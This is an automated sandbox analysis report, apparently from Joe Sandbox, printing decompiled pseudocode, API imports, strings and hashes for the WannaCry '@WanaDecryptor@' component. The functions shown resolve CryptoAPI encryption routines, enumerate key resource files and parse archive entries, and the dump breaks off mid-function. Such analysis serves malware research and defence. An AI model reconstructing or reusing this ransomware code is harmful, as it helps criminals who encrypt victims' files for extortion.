                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#800ClipboardGlobal$#3301#924wcslen$AllocByteCharCloseDataEmptyFreeLockMultiOpenUnlockWide
                                                      • String ID:
                                                      • API String ID: 3405503685-0
                                                      • Opcode ID: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
                                                      • Instruction ID: c86228cefcec1f34603e32cf9825c4429cf2ad1f23db843e272d7cdac5f24a66
                                                      • Opcode Fuzzy Hash: 8830a6fbde82a0506a617069f42227a829ac694ec6c697a23238cf2d660267b9
                                                      • Instruction Fuzzy Hash: 0151E571204706ABD320DF64DC45FEBB7A8FB88754F10462DF249A72D0DB749909CBAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 69%
                                                      			E00403CB0(struct _WIN32_FIND_DATAA* __ecx) {
                                                      				void* _t31;
                                                      				int _t34;
                                                      				int _t37;
                                                      				intOrPtr _t39;
                                                      				int _t42;
                                                      				struct _WIN32_FIND_DATAA* _t54;
                                                      				void* _t75;
                                                      				struct _IO_FILE* _t76;
                                                      				struct _WIN32_FIND_DATAA* _t79;
                                                      				void* _t81;
                                                      				void* _t82;
                                                      				void* _t83;
                                                      				void* _t84;
                                                      
                                                      				_t54 = __ecx;
                                                      				_t79 = __ecx;
                                                      				 *((intOrPtr*)(_t81 + 0xc)) = __ecx;
                                                      				_t31 = FindFirstFileA("*.res", _t81 + 0xcc);
                                                      				 *(_t81 + 8) = _t31;
                                                      				if(_t31 != 0xffffffff) {
                                                      					goto L3;
                                                      					L14:
                                                      					_t75 =  *(_t81 + 0x14);
                                                      					_t54 = _t81 + 0xdc;
                                                      					if(FindNextFileA(_t75, _t54) != 0) {
                                                      						L3:
                                                      						if(( *(_t81 + 0xdc) & 0x00000010) == 0) {
                                                      							asm("repne scasb");
                                                      							if( !(_t54 | 0xffffffff) - 1 == 0xc) {
                                                      								_t34 = sscanf(_t81 + 0x108, "%08X.res", _t81 + 0x1c);
                                                      								_t81 = _t81 + 0xc;
                                                      								if(_t34 >= 1) {
                                                      									_t76 = fopen(_t81 + 0x108, "rb");
                                                      									_t81 = _t81 + 8;
                                                      									 *(_t81 + 0x18) = _t76;
                                                      									if(_t76 != 0) {
                                                      										_t37 = fread(_t81 + 0x5c, 0x88, 1, _t76);
                                                      										_t82 = _t81 + 0x10;
                                                      										if(_t37 == 1) {
                                                      											_t39 =  *((intOrPtr*)(_t82 + 0x1c));
                                                      											_t60 =  *((intOrPtr*)(_t82 + 0x5c));
                                                      											if( *((intOrPtr*)(_t82 + 0x5c)) == _t39) {
                                                      												if(_t39 != 0) {
                                                      													 *((char*)(_t82 + 0x21)) = 0x5c;
                                                      													 *((char*)(_t82 + 0x28)) = 0x5c;
                                                      													E00401C30(_t60, _t39, _t82 + 0x22);
                                                      													_t83 = _t82 + 8;
                                                      													_push(_t83 + 0x20);
                                                      													_push(0);
                                                      													_push(0x143);
                                                      												} else {
                                                      													sprintf(_t82 + 0x20, "My Computer");
                                                      													_t83 = _t82 + 8;
                                                      													_push(_t83 + 0x20);
                                                      													_push(0);
                                                      													_push(0x14a);
                                                      												}
                                                      												_t42 = SendMessageA( *(_t79 + 0xc0), ??, ??, ??);
                                                      												_push(0x88);
                                                      												L00412CEC();
                                                      												_t84 = _t83 + 4;
                                                      												memcpy(_t42, _t84 + 0x54, 0x22 << 2);
                                                      												_t82 = _t84 + 0xc;
                                                      												SendMessageA( *( *((intOrPtr*)(_t83 + 0x14)) + 0xc0), 0x151, _t42, _t42);
                                                      												_t76 =  *(_t82 + 0x18);
                                                      												_t79 =  *((intOrPtr*)(_t82 + 0x10));
                                                      											}
                                                      										}
                                                      										fclose(_t76);
                                                      										_t81 = _t82 + 4;
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						goto L14;
                                                      					} else {
                                                      						FindClose(_t75);
                                                      						return 1;
                                                      					}
                                                      				} else {
                                                      					return 0;
                                                      				}
                                                      			}

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$FileMessageSend$#823CloseFirstNextfclosefopenfreadsprintfsscanf
                                                      • String ID: %08X.res$*.res$My Computer$\$\
                                                      • API String ID: 1476605332-298172004
                                                      • Opcode ID: 7cb988677e937bd58c99c4df6902c5c20c027946b77c77249284c9a5f5064ae7
                                                      • Instruction ID: 8c176cb2dc152f679f03352499a178afa0a04d74b0fbd326e0cc20a81f44b8b1
                                                      • Opcode Fuzzy Hash: 7cb988677e937bd58c99c4df6902c5c20c027946b77c77249284c9a5f5064ae7
                                                      • Instruction Fuzzy Hash: F741C671508300ABE710CB54DC45FEB7799EFC4715F404A2DF984A62C1E7B8EA498B9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E00404B70() {
                                                      				_Unknown_base(*)()* _t9;
                                                      				struct HINSTANCE__* _t20;
                                                      
                                                      				if( *0x4217c0 == 0) {
                                                      					_t20 = LoadLibraryA("advapi32.dll");
                                                      					if(_t20 == 0) {
                                                      						L10:
                                                      						return 0;
                                                      					} else {
                                                      						 *0x4217c0 = GetProcAddress(_t20, "CryptAcquireContextA");
                                                      						 *0x4217c4 = GetProcAddress(_t20, "CryptImportKey");
                                                      						 *0x4217c8 = GetProcAddress(_t20, "CryptDestroyKey");
                                                      						 *0x4217cc = GetProcAddress(_t20, "CryptEncrypt");
                                                      						 *0x4217d0 = GetProcAddress(_t20, "CryptDecrypt");
                                                      						_t9 = GetProcAddress(_t20, "CryptGenKey");
                                                      						 *0x4217d4 = _t9;
                                                      						if( *0x4217c0 == 0 ||  *0x4217c4 == 0 ||  *0x4217c8 == 0 ||  *0x4217cc == 0 ||  *0x4217d0 == 0 || _t9 == 0) {
                                                      							goto L10;
                                                      						} else {
                                                      							return 1;
                                                      						}
                                                      					}
                                                      				} else {
                                                      					return 1;
                                                      				}
                                                      			}

                                                      APIs
                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00402C46), ref: 00404B86
                                                      • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404BA3
                                                      • GetProcAddress.KERNEL32(00000000,CryptImportKey), ref: 00404BB0
                                                      • GetProcAddress.KERNEL32(00000000,CryptDestroyKey), ref: 00404BBD
                                                      • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 00404BCA
                                                      • GetProcAddress.KERNEL32(00000000,CryptDecrypt), ref: 00404BD7
                                                      • GetProcAddress.KERNEL32(00000000,CryptGenKey), ref: 00404BE4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$LibraryLoad
                                                      • String ID: CryptAcquireContextA$CryptDecrypt$CryptDestroyKey$CryptEncrypt$CryptGenKey$CryptImportKey$advapi32.dll
                                                      • API String ID: 2238633743-2459060434
                                                      • Opcode ID: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
                                                      • Instruction ID: 00e3496518ad86b0ae3e163ac91477e164a9cb94f9785d2b2dfdbbcf4affa7e0
                                                      • Opcode Fuzzy Hash: 76a5095adcaff83da50827021ea7e3f960384e315c05d83dddbeb63d2a682abb
                                                      • Instruction Fuzzy Hash: 441182B074635196D738AB67FD14AA726D4EFE1B01B85053BE401D3AB0C7B888028A9C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 87%
                                                      			E004080C0(intOrPtr __ecx) {
                                                      				void _v999;
                                                      				char _v1000;
                                                      				void* _v1012;
                                                      				char _v1100;
                                                      				char _v1200;
                                                      				char _v1476;
                                                      				signed char _v1520;
                                                      				intOrPtr _v1648;
                                                      				void _v1656;
                                                      				intOrPtr _v1660;
                                                      				intOrPtr _v1664;
                                                      				intOrPtr _v1668;
                                                      				intOrPtr _v1672;
                                                      				intOrPtr _v1696;
                                                      				void _v1788;
                                                      				void _v1792;
                                                      				void* _v1796;
                                                      				char _v1800;
                                                      				intOrPtr _v1804;
                                                      				intOrPtr _v1808;
                                                      				void* _v1820;
                                                      				char _t44;
                                                      				void* _t47;
                                                      				void* _t50;
                                                      				void* _t54;
                                                      				int _t57;
                                                      				int _t60;
                                                      				int _t62;
                                                      				struct _WIN32_FIND_DATAA* _t74;
                                                      				intOrPtr _t103;
                                                      				void* _t104;
                                                      				struct _IO_FILE* _t105;
                                                      				void* _t110;
                                                      				intOrPtr _t113;
                                                      				void* _t114;
                                                      				void* _t126;
                                                      
                                                      				_t103 = __ecx;
                                                      				memset( &_v1788, 0, 0x21 << 2);
                                                      				_t44 =  *0x421798; // 0x0
                                                      				_v1000 = _t44;
                                                      				_v1808 = _t103;
                                                      				memset( &_v999, 0, 0xf9 << 2);
                                                      				_t110 =  &_v1808 + 0x18;
                                                      				asm("stosw");
                                                      				_t74 =  &_v1520;
                                                      				_v1804 = 0;
                                                      				asm("stosb");
                                                      				_t47 = FindFirstFileA("*.res", _t74);
                                                      				_v1796 = _t47;
                                                      				if(_t47 == 0xffffffff) {
                                                      					L13:
                                                      					_push(_v1804);
                                                      					_t50 = E00401E30(_t124, _t126, _v1672,  &_v1200);
                                                      					sprintf( &_v1000, "---\t%s\t%s\t%d\t%I64d\t%d", E00401E30(_t124, _t126, _v1696,  &_v1100), _t50, _v1668, _v1664, _v1660);
                                                      					_t113 = _t110 + 0x30;
                                                      					_push(0);
                                                      					_v1808 = _t113;
                                                      					L00412CAA();
                                                      					_t79 = _t103;
                                                      					_t54 = E004082C0(_t103,  &_v1000,  &_v1000);
                                                      					if(_t54 != 0xffffffff) {
                                                      						return _t54;
                                                      					}
                                                      					_push(0);
                                                      					 *((intOrPtr*)(_t113 + 0x18)) = _t113;
                                                      					L00412CAA();
                                                      					return E004082C0(_t103, _t113 + 0x340, _t79);
                                                      				} else {
                                                      					goto L2;
                                                      					L11:
                                                      					_t104 = _v1796;
                                                      					_t74 =  &_v1520;
                                                      					_t57 = FindNextFileA(_t104, _t74);
                                                      					_t124 = _t57;
                                                      					if(_t57 != 0) {
                                                      						L2:
                                                      						if((_v1520 & 0x00000010) == 0) {
                                                      							asm("repne scasb");
                                                      							if( !(_t74 | 0xffffffff) - 1 == 0xc) {
                                                      								_t60 = sscanf( &_v1476, "%08X.res",  &_v1800);
                                                      								_t110 = _t110 + 0xc;
                                                      								if(_t60 >= 1) {
                                                      									_t105 = fopen( &_v1476, "rb");
                                                      									_t110 = _t110 + 8;
                                                      									if(_t105 != 0) {
                                                      										_t62 = fread( &_v1656, 0x88, 1, _t105);
                                                      										_t114 = _t110 + 0x10;
                                                      										if(_t62 == 1 && _v1648 == _v1800) {
                                                      											_v1804 = _v1804 + 1;
                                                      										}
                                                      										fclose(_t105);
                                                      										_t110 = _t114 + 4;
                                                      										if(_v1648 == 0) {
                                                      											memcpy( &_v1792,  &_v1656, 0x22 << 2);
                                                      											_t110 = _t110 + 0xc;
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						goto L11;
                                                      					} else {
                                                      						FindClose(_t104);
                                                      						_t103 = _v1808;
                                                      						goto L13;
                                                      					}
                                                      				}
                                                      			}

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Find$#537File$CloseFirstNextfclosefopenfreadsprintfsscanf
                                                      • String ID: %08X.res$*.res$---%s%s%d%I64d%d
                                                      • API String ID: 1530363904-2310201135
                                                      • Opcode ID: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
                                                      • Instruction ID: f4d275e2d06bc6c2fe64a46714bc06f3fac9236f3415a442fab0096444624429
                                                      • Opcode Fuzzy Hash: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
                                                      • Instruction Fuzzy Hash: F051B370604740ABD634CB24DD45BEF77E9EFC4314F00492EF98897291DB78AA098B9A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 91%
                                                      			E00411CF0(intOrPtr* __ecx) {
                                                      				intOrPtr _t142;
                                                      				signed int _t147;
                                                      				signed int _t149;
                                                      				intOrPtr _t150;
                                                      				void* _t152;
                                                      				signed int _t157;
                                                      				signed int _t160;
                                                      				unsigned int _t162;
                                                      				signed char _t164;
                                                      				struct _FILETIME _t177;
                                                      				struct _FILETIME _t180;
                                                      				intOrPtr _t182;
                                                      				signed int _t186;
                                                      				signed char _t188;
                                                      				struct _FILETIME _t204;
                                                      				struct _FILETIME _t212;
                                                      				signed int _t215;
                                                      				signed int _t217;
                                                      				signed int _t219;
                                                      				intOrPtr* _t226;
                                                      				signed int _t231;
                                                      				signed int _t232;
                                                      				signed int _t234;
                                                      				signed int _t235;
                                                      				signed int _t239;
                                                      				unsigned int _t248;
                                                      				signed int _t249;
                                                      				int _t252;
                                                      				signed char _t264;
                                                      				intOrPtr _t269;
                                                      				intOrPtr* _t273;
                                                      				signed int _t276;
                                                      				unsigned int _t297;
                                                      				signed int _t299;
                                                      				intOrPtr _t300;
                                                      				signed int _t303;
                                                      				intOrPtr _t307;
                                                      				intOrPtr _t309;
                                                      				signed int _t311;
                                                      				intOrPtr _t312;
                                                      				intOrPtr _t313;
                                                      				intOrPtr* _t321;
                                                      				signed int _t329;
                                                      				intOrPtr* _t336;
                                                      				void* _t337;
                                                      				void* _t338;
                                                      				signed int _t340;
                                                      				signed int _t341;
                                                      				void* _t343;
                                                      				void* _t346;
                                                      				void* _t348;
                                                      				void* _t349;
                                                      				void* _t350;
                                                      				void* _t351;
                                                      				void* _t353;
                                                      				void* _t354;
                                                      				void* _t355;
                                                      				void* _t356;
                                                      
                                                      				_t312 =  *((intOrPtr*)(_t348 + 0x294));
                                                      				_t232 = _t231 | 0xffffffff;
                                                      				_t336 = __ecx;
                                                      				 *((intOrPtr*)(_t348 + 0x1c)) = __ecx;
                                                      				if(_t312 < _t232) {
                                                      					L72:
                                                      					return 0x10000;
                                                      				} else {
                                                      					_t140 =  *__ecx;
                                                      					if(_t312 >=  *((intOrPtr*)( *__ecx + 4))) {
                                                      						goto L72;
                                                      					} else {
                                                      						if( *((intOrPtr*)(__ecx + 4)) != _t232) {
                                                      							E00411AC0(_t140);
                                                      							_t348 = _t348 + 4;
                                                      						}
                                                      						 *(_t336 + 4) = _t232;
                                                      						if(_t312 !=  *((intOrPtr*)(_t336 + 0x134))) {
                                                      							__eflags = _t312 - _t232;
                                                      							if(_t312 != _t232) {
                                                      								_t142 =  *_t336;
                                                      								__eflags = _t312 -  *((intOrPtr*)(_t142 + 0x10));
                                                      								if(_t312 <  *((intOrPtr*)(_t142 + 0x10))) {
                                                      									E00411390(_t142);
                                                      									_t348 = _t348 + 4;
                                                      								}
                                                      								_t143 =  *_t336;
                                                      								__eflags =  *( *_t336 + 0x10) - _t312;
                                                      								while(__eflags < 0) {
                                                      									E004113E0(_t143);
                                                      									_t143 =  *_t336;
                                                      									_t348 = _t348 + 4;
                                                      									__eflags =  *( *_t336 + 0x10) - _t312;
                                                      								}
                                                      								E00411350( *_t336, _t348 + 0x4c, _t348 + 0x98, 0x104, 0, 0, 0, 0);
                                                      								_t147 = E00411460(__eflags,  *_t336, _t348 + 0x58, _t348 + 0x40, _t348 + 0x30);
                                                      								_t349 = _t348 + 0x30;
                                                      								__eflags = _t147;
                                                      								if(_t147 == 0) {
                                                      									_t149 = E00410A50( *((intOrPtr*)( *_t336)),  *((intOrPtr*)(_t349 + 0x20)), 0);
                                                      									_t350 = _t349 + 0xc;
                                                      									__eflags = _t149;
                                                      									if(_t149 == 0) {
                                                      										_t150 =  *((intOrPtr*)(_t350 + 0x10));
                                                      										_push(_t150);
                                                      										L00412CEC();
                                                      										_t313 = _t150;
                                                      										 *((intOrPtr*)(_t350 + 0x1c)) = _t313;
                                                      										_t152 = E00410AF0(_t313, 1,  *((intOrPtr*)(_t350 + 0x14)),  *((intOrPtr*)( *_t336)));
                                                      										_t351 = _t350 + 0x14;
                                                      										__eflags = _t152 -  *((intOrPtr*)(_t350 + 0x24));
                                                      										if(_t152 ==  *((intOrPtr*)(_t350 + 0x24))) {
                                                      											_t346 =  *(_t351 + 0x29c);
                                                      											asm("repne scasb");
                                                      											_t248 =  !_t232;
                                                      											 *_t346 =  *( *_t336 + 0x10);
                                                      											_t337 = _t351 + 0x88 - _t248;
                                                      											_t249 = _t248 >> 2;
                                                      											_t252 = memcpy(_t351 + 0x190, _t337, _t249 << 2) & 0x00000003;
                                                      											__eflags = _t252;
                                                      											memcpy(_t337 + _t249 + _t249, _t337, _t252);
                                                      											_t353 = _t351 + 0x18;
                                                      											_t321 = _t353 + 0x190;
                                                      											while(1) {
                                                      												_t157 =  *_t321;
                                                      												__eflags = _t157;
                                                      												if(_t157 == 0) {
                                                      													goto L23;
                                                      												}
                                                      												L21:
                                                      												__eflags =  *((intOrPtr*)(_t321 + 1)) - 0x3a;
                                                      												if( *((intOrPtr*)(_t321 + 1)) == 0x3a) {
                                                      													_t321 = _t321 + 2;
                                                      													while(1) {
                                                      														_t157 =  *_t321;
                                                      														__eflags = _t157;
                                                      														if(_t157 == 0) {
                                                      															goto L23;
                                                      														}
                                                      														goto L21;
                                                      													}
                                                      												}
                                                      												L23:
                                                      												__eflags = _t157 - 0x5c;
                                                      												if(_t157 == 0x5c) {
                                                      													_t321 = _t321 + 1;
                                                      													while(1) {
                                                      														_t157 =  *_t321;
                                                      														__eflags = _t157;
                                                      														if(_t157 == 0) {
                                                      															goto L23;
                                                      														}
                                                      														goto L21;
                                                      													}
                                                      												}
                                                      												__eflags = _t157 - 0x2f;
                                                      												if(_t157 == 0x2f) {
                                                      													_t321 = _t321 + 1;
                                                      													while(1) {
                                                      														_t157 =  *_t321;
                                                      														__eflags = _t157;
                                                      														if(_t157 == 0) {
                                                      															goto L23;
                                                      														}
                                                      														goto L21;
                                                      													}
                                                      												}
                                                      												_push("\\..\\");
                                                      												_push(_t321);
                                                      												L004132C4();
                                                      												_t353 = _t353 + 8;
                                                      												__eflags = _t157;
                                                      												if(_t157 != 0) {
                                                      													_t41 = _t157 + 4; // 0x4
                                                      													_t321 = _t41;
                                                      													while(1) {
                                                      														_t157 =  *_t321;
                                                      														__eflags = _t157;
                                                      														if(_t157 == 0) {
                                                      															goto L23;
                                                      														}
                                                      														goto L21;
                                                      													}
                                                      												}
                                                      												_push("\\../");
                                                      												_push(_t321);
                                                      												L004132C4();
                                                      												_t353 = _t353 + 8;
                                                      												__eflags = _t157;
                                                      												if(_t157 != 0) {
                                                      													_t42 = _t157 + 4; // 0x4
                                                      													_t321 = _t42;
                                                      													while(1) {
                                                      														_t157 =  *_t321;
                                                      														__eflags = _t157;
                                                      														if(_t157 == 0) {
                                                      															goto L23;
                                                      														}
                                                      														goto L21;
                                                      													}
                                                      												}
                                                      												_push("/../");
                                                      												_push(_t321);
                                                      												L004132C4();
                                                      												_t353 = _t353 + 8;
                                                      												__eflags = _t157;
                                                      												if(_t157 != 0) {
                                                      													_t43 = _t157 + 4; // 0x4
                                                      													_t321 = _t43;
                                                      													while(1) {
                                                      														_t157 =  *_t321;
                                                      														__eflags = _t157;
                                                      														if(_t157 == 0) {
                                                      															goto L23;
                                                      														}
                                                      														goto L21;
                                                      													}
                                                      													goto L23;
                                                      												}
                                                      												_push("/..\\");
                                                      												_push(_t321);
                                                      												L004132C4();
                                                      												_t353 = _t353 + 8;
                                                      												__eflags = _t157;
                                                      												if(_t157 != 0) {
                                                      													_t44 = _t157 + 4; // 0x4
                                                      													_t321 = _t44;
                                                      													continue;
                                                      												}
                                                      												asm("repne scasb");
                                                      												_t338 = _t321 -  !0xffffffff;
                                                      												_t297 =  *(_t353 + 0x70);
                                                      												_t160 = memcpy(_t346 + 4, _t338,  !0xffffffff >> 2 << 2);
                                                      												_t354 = _t353 + 0xc;
                                                      												 *((char*)(_t354 + 0x13)) = 0;
                                                      												_t162 = memcpy(_t338 + 0x175b75a, _t338, _t160 & 0x00000003);
                                                      												_t355 = _t354 + 0xc;
                                                      												_t164 = _t162 >> 0x0000001e & 0x00000001;
                                                      												_t264 =  !(_t297 >> 0x17) & 0x00000001;
                                                      												_t340 =  *(_t355 + 0x3c) >> 8;
                                                      												__eflags = _t340;
                                                      												 *(_t355 + 0x12) = 0;
                                                      												_t234 = 1;
                                                      												if(_t340 == 0) {
                                                      													L39:
                                                      													_t264 = _t297 & 0x00000001;
                                                      													 *(_t355 + 0x13) = _t297 >> 0x00000001 & 0x00000001;
                                                      													 *(_t355 + 0x12) = _t297 >> 0x00000002 & 0x00000001;
                                                      													_t164 = _t297 >> 0x00000004 & 0x00000001;
                                                      													_t299 = _t297 >> 0x00000005 & 0x00000001;
                                                      													__eflags = _t299;
                                                      													_t234 = _t299;
                                                      												} else {
                                                      													__eflags = _t340 - 7;
                                                      													if(_t340 == 7) {
                                                      														goto L39;
                                                      													} else {
                                                      														__eflags = _t340 - 0xb;
                                                      														if(_t340 == 0xb) {
                                                      															goto L39;
                                                      														} else {
                                                      															__eflags = _t340 - 0xe;
                                                      															if(_t340 == 0xe) {
                                                      																goto L39;
                                                      															}
                                                      														}
                                                      													}
                                                      												}
                                                      												_t341 = 0;
                                                      												__eflags = _t164;
                                                      												 *(_t346 + 0x108) = 0;
                                                      												if(_t164 != 0) {
                                                      													 *(_t346 + 0x108) = 0x10;
                                                      												}
                                                      												__eflags = _t234;
                                                      												if(_t234 != 0) {
                                                      													_t219 =  *(_t346 + 0x108) | 0x00000020;
                                                      													__eflags = _t219;
                                                      													 *(_t346 + 0x108) = _t219;
                                                      												}
                                                      												__eflags =  *(_t355 + 0x13);
                                                      												if( *(_t355 + 0x13) != 0) {
                                                      													_t217 =  *(_t346 + 0x108) | 0x00000002;
                                                      													__eflags = _t217;
                                                      													 *(_t346 + 0x108) = _t217;
                                                      												}
                                                      												__eflags = _t264;
                                                      												if(_t264 != 0) {
                                                      													_t215 =  *(_t346 + 0x108) | 0x00000001;
                                                      													__eflags = _t215;
                                                      													 *(_t346 + 0x108) = _t215;
                                                      												}
                                                      												__eflags =  *(_t355 + 0x12);
                                                      												if( *(_t355 + 0x12) != 0) {
                                                      													_t63 = _t346 + 0x108;
                                                      													 *_t63 =  *(_t346 + 0x108) | 0x00000004;
                                                      													__eflags =  *_t63;
                                                      												}
                                                      												_t300 =  *((intOrPtr*)(_t355 + 0x58));
                                                      												 *((intOrPtr*)(_t346 + 0x124)) =  *((intOrPtr*)(_t355 + 0x54));
                                                      												 *((intOrPtr*)(_t346 + 0x128)) = _t300;
                                                      												_t177 = E00411B80( *(_t355 + 0x4c) >> 0x10,  *(_t355 + 0x4c));
                                                      												_t356 = _t355 + 8;
                                                      												 *(_t356 + 0x30) = _t177;
                                                      												 *((intOrPtr*)(_t356 + 0x3c)) = _t300;
                                                      												LocalFileTimeToFileTime(_t356 + 0x30, _t356 + 0x28);
                                                      												_t180 =  *(_t356 + 0x28);
                                                      												_t269 =  *((intOrPtr*)(_t356 + 0x2c));
                                                      												 *(_t346 + 0x10c) = _t180;
                                                      												 *(_t346 + 0x114) = _t180;
                                                      												 *(_t346 + 0x11c) = _t180;
                                                      												__eflags =  *((intOrPtr*)(_t356 + 0x14)) - 4;
                                                      												 *((intOrPtr*)(_t346 + 0x110)) = _t269;
                                                      												 *((intOrPtr*)(_t346 + 0x118)) = _t269;
                                                      												 *((intOrPtr*)(_t346 + 0x120)) = _t269;
                                                      												if( *((intOrPtr*)(_t356 + 0x14)) <= 4) {
                                                      													_t329 =  *(_t356 + 0x1c);
                                                      												} else {
                                                      													_t329 =  *(_t356 + 0x1c);
                                                      													 *((char*)(_t356 + 0x1a)) = 0;
                                                      													do {
                                                      														 *((char*)(_t356 + 0x19)) =  *((intOrPtr*)(_t329 + _t341 + 1));
                                                      														 *(_t356 + 0x18) =  *((intOrPtr*)(_t341 + _t329));
                                                      														_t273 = "UT";
                                                      														_t186 = _t356 + 0x18;
                                                      														while(1) {
                                                      															_t235 =  *_t186;
                                                      															_t303 = _t235;
                                                      															__eflags = _t235 -  *_t273;
                                                      															if(_t235 !=  *_t273) {
                                                      																break;
                                                      															}
                                                      															__eflags = _t303;
                                                      															if(_t303 == 0) {
                                                      																L57:
                                                      																_t186 = 0;
                                                      															} else {
                                                      																_t239 =  *((intOrPtr*)(_t186 + 1));
                                                      																_t311 = _t239;
                                                      																_t92 = _t273 + 1; // 0x2f000054
                                                      																__eflags = _t239 -  *_t92;
                                                      																if(_t239 !=  *_t92) {
                                                      																	break;
                                                      																} else {
                                                      																	_t186 = _t186 + 2;
                                                      																	_t273 = _t273 + 2;
                                                      																	__eflags = _t311;
                                                      																	if(_t311 != 0) {
                                                      																		continue;
                                                      																	} else {
                                                      																		goto L57;
                                                      																	}
                                                      																}
                                                      															}
                                                      															L59:
                                                      															__eflags = _t186;
                                                      															if(_t186 == 0) {
                                                      																_t188 =  *((intOrPtr*)(_t341 + _t329 + 4));
                                                      																_t343 = _t341 + 5;
                                                      																_t276 = 1;
                                                      																__eflags = _t188 & 0x00000001;
                                                      																 *((char*)(_t356 + 0x12)) = 1;
                                                      																if((_t188 & 0x00000001) != 0) {
                                                      																	_t309 =  *((intOrPtr*)(_t343 + _t329));
                                                      																	_t343 = _t343 + 4;
                                                      																	__eflags = 0 << 8;
                                                      																	_t212 = E00411B50(_t309, 0 << 8 << 8);
                                                      																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
                                                      																	 *(_t346 + 0x11c) = _t212;
                                                      																	_t356 = _t356 + 4;
                                                      																	 *((intOrPtr*)(_t346 + 0x120)) = 0;
                                                      																}
                                                      																__eflags = 1;
                                                      																if(1 != 0) {
                                                      																	_t307 =  *((intOrPtr*)(_t343 + _t329));
                                                      																	_t343 = _t343 + 4;
                                                      																	__eflags = 0 << 8;
                                                      																	_t204 = E00411B50(_t307, 0 << 8 << 8);
                                                      																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
                                                      																	 *(_t346 + 0x10c) = _t204;
                                                      																	_t356 = _t356 + 4;
                                                      																	 *((intOrPtr*)(_t346 + 0x110)) = 0;
                                                      																}
                                                      																__eflags = _t276;
                                                      																if(_t276 != 0) {
                                                      																	 *(_t346 + 0x114) = E00411B50( *((intOrPtr*)(_t343 + _t329)), 0 << 8 << 8);
                                                      																	_t356 = _t356 + 4;
                                                      																	 *((intOrPtr*)(_t346 + 0x118)) = 0;
                                                      																}
                                                      															} else {
                                                      																goto L60;
                                                      															}
                                                      															goto L69;
                                                      														}
                                                      														asm("sbb eax, eax");
                                                      														asm("sbb eax, 0xffffffff");
                                                      														goto L59;
                                                      														L60:
                                                      														_t341 = _t341 + 4;
                                                      														__eflags = _t341 + 4 -  *((intOrPtr*)(_t356 + 0x14));
                                                      													} while (_t341 + 4 <  *((intOrPtr*)(_t356 + 0x14)));
                                                      												}
                                                      												L69:
                                                      												__eflags = _t329;
                                                      												if(_t329 != 0) {
                                                      													_push(_t329);
                                                      													L00412C98();
                                                      													_t356 = _t356 + 4;
                                                      												}
                                                      												_t182 =  *((intOrPtr*)(_t356 + 0x20));
                                                      												memcpy(_t182 + 8, _t346, 0x4b << 2);
